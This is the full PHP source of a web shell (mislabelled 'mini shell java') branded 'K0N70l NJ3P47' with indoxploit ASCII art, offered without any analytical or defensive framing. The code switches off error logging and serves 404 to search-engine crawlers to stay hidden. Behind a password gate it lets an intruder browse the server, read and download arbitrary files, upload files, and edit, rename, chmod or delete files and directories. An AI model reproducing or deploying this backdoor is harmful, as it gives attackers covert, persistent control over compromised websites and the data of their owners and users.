mini shell java

1. <?php
2. session_start();
3. error_reporting(0);
4. set_time_limit(0);
5. @set_magic_quotes_runtime(0);
6. @clearstatcache();
7. @ini_set('error_log',NULL);
8. @ini_set('log_errors',0);
9. @ini_set('max_execution_time',0);
10. @ini_set('output_buffering',0);
11. @ini_set('display_errors', 0);
12.  
13. $auth_pass = "40fa73c9d0083043c6576dd2b40511e4"; // default: net
14. $color = "#00ff00";
15. $default_action = 'FilesMan';
16. $default_use_ajax = true;
17. $default_charset = 'UTF-8';
18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
21. header('HTTP/1.0 404 Not Found');
22. exit;
23. }
24. }
25.  
26. function login_shell() {
27. ?>
28.  
29. <embed src="http://www.youtube.com/v/nGsESTQOPkQ&autoplay=1" type="application/x-shockwave-flash"wmode="transparent" width="1" height="1"></embed>
30. <html>
31. <head>
32. <title>K0N70l NJ3P47</title>
33. <style type="text/css">
34. html {
35. margin: 20px auto;
36. background: #000000;
37. color: green;
38. text-align: center;
39. }
40. header {
41. color: green;
42. margin: 10px auto;
43. }
44. input[type=password] {
45. width: 250px;
46. height: 25px;
47. color: red;
48. background: #000000;
49. border: 1px dotted green;
50. padding: 5px;
51. margin-left: 20px;
52. text-align: center;
53. }
54. .kedip {
55. -webkit-animation-name: blinker;
56. -webkit-animation-duration: 3s;
57. -webkit-animation-timing-function: linear;
58. -webkit-animation-iteration-count: infinite;
59.  
60. -moz-animation-name: blinker;
61. -moz-animation-duration: 2s;
62. -moz-animation-timing-function: linear;
63. -moz-animation-iteration-count: infinite;
64.  
65. animation-name: blinker;
66. animation-duration: 1s;
67. animation-timing-function: linear;
68. animation-iteration-count: infinite;
69.  
70. color: cyan;
71. }
72.  
73. @-moz-keyframes blinker {
74. 0% { opacity: 1.0; }
75. 50% { opacity: 0.0; }
76. 100% { opacity: 1.0; }
77. }
78.  
79. @-webkit-keyframes blinker {
80. 0% { opacity: 1.0; }
81. 50% { opacity: 0.0; }
82. 100% { opacity: 1.0; }
83. }
84.  
85. @keyframes blinker {
86. 0% { opacity: 1.0; }
87. 50% { opacity: 0.0; }
88. 100% { opacity: 1.0; }
89. }
90. </style>
91. </head>
92. <center>
93. <header>
94. <pre onkeydown="return false;" onmousedown="return false;" class="kedip">
95. ___________________________
96. < root@indoxploit:~# w00t??? >
97. ---------------------------
98. \ , ,
99. \ /( )`
100. \ \ \___ / |
101. /- _ `-/ '
102. (/\/ \ \ /\
103. / / | ` \
104. O O ) / |
105. `-^--'`< '
106. (_.) _ ) /
107. `.___/` /
108. `-----' /
109. <----. __ / __ \
110. <----|====O)))==) \) /====
111. <----' `--' `.__,' \
112. | |
113. \ /
114. ______( (_ / \______
115. ,' ,-----' | \
116. `--{__________) \/
117.  
118. </pre>
119. </header>
120. <form method="post">
121. <input type="password" name="pass">
122. </form>
123. <?php
124. exit;
125. }
126. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
127. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
128. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
129. else
130. login_shell();
131. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
132. @ob_clean();
133. $file = $_GET['file'];
134. header('Content-Description: File Transfer');
135. header('Content-Type: application/octet-stream');
136. header('Content-Disposition: attachment; filename="'.basename($file).'"');
137. header('Expires: 0');
138. header('Cache-Control: must-revalidate');
139. header('Pragma: public');
140. header('Content-Length: ' . filesize($file));
141. readfile($file);
142. exit;
143. }
144.  
145. ?>
146.  
147. <?php
148. error_reporting(0);
149. set_time_limit(0);
150.  
151. if(get_magic_quotes_gpc()){
152. foreach($_POST as $key=>$value){
153. $_POST[$key] = stripslashes($value);
154. }
155. }
156. echo '<!DOCTYPE HTML>
157. <embed src="http://www.youtube.com/v/nGsESTQOPkQ&autoplay=1" type="application/x-shockwave-flash"wmode="transparent" width="1" height="1"></embed>
158. <html>
159. <head>
160. <link href="" rel="stylesheet" type="text/css">
161. <title>K0N70l NJ3P47</title>
162. <style>
163. body{
164. font-family: "Racing Sans One", cursive;
165. <embed src="http://www.youtube.com/v/56bK56eiaDY&autoplay=1" type="application/x-shockwave-flash"wmode="transparent" width="1" height="1"></embed>
166. }
167.  
168. body {
169. background: url(https://scontent-sit4-1.xx.fbcdn.net/v/t1.0-9/19247898_195038844356980_794499332495513803_n.jpg?oh=6bbcb39990c39cab81c9df39dc6a09b1&oe=59F03D8B) no-repeat fixed;
170. -webkit-background-size: 100% 100%;
171. -moz-background-size: 100% 100%;
172. -o-background-size: 100% 100%;
173. background-size: 100% 100%;
174. }
175. color:white;
176. }
177. #content tr:hover{
178. background-color: red;
179. text-shadow:0px 0px 10px #fff;
180. }
181. #content .first{
182. background-color: red;
183. }
184. table{
185. border: 1px #000000 dotted;
186. }
187. a{
188. color:white;
189. text-decoration: none;
190. }
191. a:hover{
192. color:blue;
193. text-shadow:0px 0px 10px #ffffff;
194. }
195. input,select,textarea{
196. border: 1px #000000 solid;
197. -moz-border-radius: 5px;
198. -webkit-border-radius:5px;
199. border-radius:5px;
200. }
201. </style>
202. </head>
203. <body>
204. <h1><center><font color="aqua">K0N70l NJ3P47</font></center></h1>
205. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
206. <tr><td><font color="white">Path :</font> ';
207. if(isset($_GET['path'])){
208. $path = $_GET['path'];
209. }else{
210. $path = getcwd();
211. }
212. $path = str_replace('\\','/',$path);
213. $paths = explode('/',$path);
214.  
215. foreach($paths as $id=>$pat){
216. if($pat == '' && $id == 0){
217. $a = true;
218. echo '<a href="?path=/">/</a>';
219. continue;
220. }
221. if($pat == '') continue;
222. echo '<a href="?path=';
223. for($i=0;$i<=$id;$i++){
224. echo "$paths[$i]";
225. if($i != $id) echo "/";
226. }
227. echo '">'.$pat.'</a>/';
228. }
229. echo '</td></tr><tr><td>';
230. if(isset($_FILES['file'])){
231. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
232. echo '<font color="green">Cekrek Aplod Beres Ndro :v</font><br />';
233. }else{
234. echo '<font color="red">Aduh Kurang Gagah Nt Ndro :V</font><br/>';
235. }
236. }
237. echo '<form enctype="multipart/form-data" method="POST">
238. <font color="white">File Upload :</font> <input type="file" name="file" />
239. <input type="submit" value="Hajar Ndro" />
240. </form>
241. </td></tr>';
242. if(isset($_GET['filesrc'])){
243. echo "<tr><td>Current File : ";
244. echo $_GET['filesrc'];
245. echo '</tr></td></table><br />';
246. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
247. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
248. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
249. if($_POST['opt'] == 'chmod'){
250. if(isset($_POST['perm'])){
251. if(chmod($_POST['path'],$_POST['perm'])){
252. echo '<font color="green">Change Permission Berhasil</font><br/>';
253. }else{
254. echo '<font color="red">Change Permission Gagal</font><br />';
255. }
256. }
257. echo '<form method="POST">
258. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
259. <input type="hidden" name="path" value="'.$_POST['path'].'">
260. <input type="hidden" name="opt" value="chmod">
261. <input type="submit" value="Go" />
262. </form>';
263. }elseif($_POST['opt'] == 'rename'){
264. if(isset($_POST['newname'])){
265. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
266. echo '<font color="green">Puputan Beres Ndro</font><br/>';
267. }else{
268. echo '<font color="red">Duh Ora Bisa Di Hapus Ndro</font><br />';
269. }
270. $_POST['name'] = $_POST['newname'];
271. }
272. echo '<form method="POST">
273. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
274. <input type="hidden" name="path" value="'.$_POST['path'].'">
275. <input type="hidden" name="opt" value="rename">
276. <input type="submit" value="Go" />
277. </form>';
278. }elseif($_POST['opt'] == 'edit'){
279. if(isset($_POST['src'])){
280. $fp = fopen($_POST['path'],'w');
281. if(fwrite($fp,$_POST['src'])){
282. echo '<font color="green">Berhasil Edit File</font><br/>';
283. }else{
284. echo '<font color="red">Gagal Edit File</font><br/>';
285. }
286. fclose($fp);
287. }
288. echo '<form method="POST">
289. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
290. <input type="hidden" name="path" value="'.$_POST['path'].'">
291. <input type="hidden" name="opt" value="edit">
292. <input type="submit" value="Save" />
293. </form>';
294. }
295. echo '</center>';
296. }else{
297. echo '</table><br/><center>';
298. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
299. if($_POST['type'] == 'dir'){
300. if(rmdir($_POST['path'])){
301. echo '<font color="green">Directory Terhapus</font><br/>';
302. }else{
303. echo '<font color="red">Directory Gagal Terhapus </font><br/>';
304. }
305. }elseif($_POST['type'] == 'file'){
306. if(unlink($_POST['path'])){
307. echo '<font color="green">Beres Ndro</font><br/>';
308. }else{
309. echo '<font color="red">Aduh Sorry Ndero Gagal</font><br/>';
310. }
311. }
312. }
313. echo '</center>';
314. $scandir = scandir($path);
315. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
316. <tr class="first">
317. <td><center>Name</peller></center></td>
318. <td><center>Size</peller></center></td>
319. <td><center>Permission</peller></center></td>
320. <td><center>Modify</peller></center></td>
321. </tr>';
322.  
323. foreach($scandir as $dir){
324. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
325. echo '<tr>
326. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
327. <td><center>--</center></td>
328. <td><center>';
329. if(is_writable($path.'/'.$dir)) echo '<font color="green">';
330. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
331. echo perms($path.'/'.$dir);
332. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
333.  
334. echo '</center></td>
335. <td><center><form method="POST" action="?option&path='.$path.'">
336. <select name="opt">
337. <option value="">Select</option>
338. <option value="delete">Delete</option>
339. <option value="chmod">Chmod</option>
340. <option value="rename">Rename</option>
341. </select>
342. <input type="hidden" name="type" value="dir">
343. <input type="hidden" name="name" value="'.$dir.'">
344. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
345. <input type="submit" value=">">
346. </form></center></td>
347. </tr>';
348. }
349. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
350. foreach($scandir as $file){
351. if(!is_file($path.'/'.$file)) continue;
352. $size = filesize($path.'/'.$file)/1024;
353. $size = round($size,3);
354. if($size >= 1024){
355. $size = round($size/1024,2).' MB';
356. }else{
357. $size = $size.' KB';
358. }
359.  
360. echo '<tr>
361. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
362. <td><center>'.$size.'</center></td>
363. <td><center>';
364. if(is_writable($path.'/'.$file)) echo '<font color="green">';
365. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
366. echo perms($path.'/'.$file);
367. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
368. echo '</center></td>
369. <td><center><form method="POST" action="?option&path='.$path.'">
370. <select name="opt">
371. <option value="">Select</option>
372. <option value="delete">Delete</option>
373. <option value="chmod">Chmod</option>
374. <option value="rename">Rename</option>
375. <option value="edit">Edit</option>
376. </select>
377. <input type="hidden" name="type" value="file">
378. <input type="hidden" name="name" value="'.$file.'">
379. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
380. <input type="submit" value=">">
381. </form></center></td>
382. </tr>';
383. }
384. echo '</table>
385. </div>';
386. }
387. echo '<center><br/>K0N70l NJ3P47 Corpright Ne7wo0ork.a.k.a ^_^ </center>
388. </body>
389. </html>';
390. function perms($file){
391. $perms = fileperms($file);
392.  
393. if (($perms & 0xC000) == 0xC000) {
394. // Socket
395. $info = 's';
396. } elseif (($perms & 0xA000) == 0xA000) {
397. // Symbolic Link
398. $info = 'l';
399. } elseif (($perms & 0x8000) == 0x8000) {
400. // Regular
401. $info = '-';
402. } elseif (($perms & 0x6000) == 0x6000) {
403. // Block special
404. $info = 'b';
405. } elseif (($perms & 0x4000) == 0x4000) {
406. // Directory
407. $info = 'd';
408. } elseif (($perms & 0x2000) == 0x2000) {
409. // Character special
410. $info = 'c';
411. } elseif (($perms & 0x1000) == 0x1000) {
412. // FIFO pipe
413. $info = 'p';
414. } else {
415. // Unknown
416. $info = 'u';
417. }
418.  
419. // Owner
420. $info .= (($perms & 0x0100) ? 'r' : '-');
421. $info .= (($perms & 0x0080) ? 'w' : '-');
422. $info .= (($perms & 0x0040) ?
423. (($perms & 0x0800) ? 's' : 'x' ) :
424. (($perms & 0x0800) ? 'S' : '-'));
425.  
426. // Group
427. $info .= (($perms & 0x0020) ? 'r' : '-');
428. $info .= (($perms & 0x0010) ? 'w' : '-');
429. $info .= (($perms & 0x0008) ?
430. (($perms & 0x0400) ? 's' : 'x' ) :
431. (($perms & 0x0400) ? 'S' : '-'));
432.  
433. // World
434. $info .= (($perms & 0x0004) ? 'r' : '-');
435. $info .= (($perms & 0x0002) ? 'w' : '-');
436. $info .= (($perms & 0x0001) ?
437. (($perms & 0x0200) ? 't' : 'x' ) :
438. (($perms & 0x0200) ? 'T' : '-'));
439.  
440. return $info;
441. }
442. ?>